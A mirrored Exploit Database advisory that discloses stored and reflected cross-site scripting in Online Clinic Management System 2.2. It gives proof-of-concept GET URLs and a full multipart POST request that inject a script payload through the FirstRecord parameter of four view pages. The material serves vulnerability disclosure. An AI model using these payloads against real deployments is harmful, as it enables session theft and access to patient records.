Online Clinic Management System 2.2 – Multiple Stored Cross-Site Scripting (XSS)

• Exploit Database
• 115 阅读

• 作者： Rafael Pedrero
  日期： 2023-05-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51439/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130

  # Exploit Title: Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS) # Date: 27-06-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://bigprof.com # Software Download Link : https://bigprof.com/appgini/applications/online-clinic-management-system # Version : 2.2 # Category: Webapps # Tested on: Windows 7 64 Bits / Windows 10 64 Bits # CVE : # Category: webapps   # Vulnerability Type: Stored Cross-Site Scripting   1. Description   Online Clinic Management System 2.2, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via the /clinic/medical_records_view.php, in FirstRecord parameter, GET and POST request.     2. Proof of Concept   GET: http://127.0.0.1/clinic/medical_records_view.php?SelectedID=2&record-added-ok=5781&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=   POST: POST http://127.0.0.1/clinic/medical_records_view.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: multipart/form-data; boundary=---------------------------1512016725878 Content-Length: 1172 Origin: https://127.0.0.1 Connection: keep-alive Referer: https://127.0.0.1/clinic/medical_records_view.php Cookie: online_clinic_management_system=bnl1ht0a4n7snalaoqgh8f85b4; online_clinic_management_system.dvp_expand=[%22tab_medical_records-patient%22%2C%22tab_events-name_patient%22] Upgrade-Insecure-Requests: 1 Host: 127.0.0.1   -----------------------------1512016725878 Content-Disposition: form-data; name="current_view"   DVP -----------------------------1512016725878 Content-Disposition: form-data; name="SortField"     -----------------------------1512016725878 Content-Disposition: form-data; name="SelectedID"   1 -----------------------------1512016725878 Content-Disposition: form-data; name="SelectedField"     -----------------------------1512016725878 Content-Disposition: form-data; name="SortDirection"     -----------------------------1512016725878 Content-Disposition: form-data; name="FirstRecord"   "><script>alert(1);</script> -----------------------------1512016725878 Content-Disposition: form-data; name="NoDV"     -----------------------------1512016725878 Content-Disposition: form-data; name="PrintDV"     -----------------------------1512016725878 Content-Disposition: form-data; name="DisplayRecords"   all -----------------------------1512016725878 Content-Disposition: form-data; name="patient"     -----------------------------1512016725878 Content-Disposition: form-data; name="SearchString"     -----------------------------1512016725878--     1. Description   Online Clinic Management System 2.2, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via the /clinic/patients_view.php, in FirstRecord parameter.     2. Proof of Concept   http://127.0.0.1/clinic/patients_view.php?SelectedID=1&record-added-ok=11536&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=     And Reflected Cross-Site Scripting (XSS) too. # Vulnerability Type: Reflected Cross-Site Scripting   1. Description   Online Clinic Management System 2.2, does not sufficiently encode user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS) vulnerability via the /clinic/events_view.php, in FirstRecord parameter.     2. Proof of Concept   http://127.0.0.1/clinic/events_view.php?SelectedID=2&record-added-ok=7758&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=     1. Description   Online Clinic Management System 2.2, does not sufficiently encode user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS) vulnerability via the /clinic/disease_symptoms_view.php, in FirstRecord parameter.     2. Proof of Concept   http://127.0.0.1/clinic/disease_symptoms_view.php?SelectedID=1&record-added-ok=1096&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=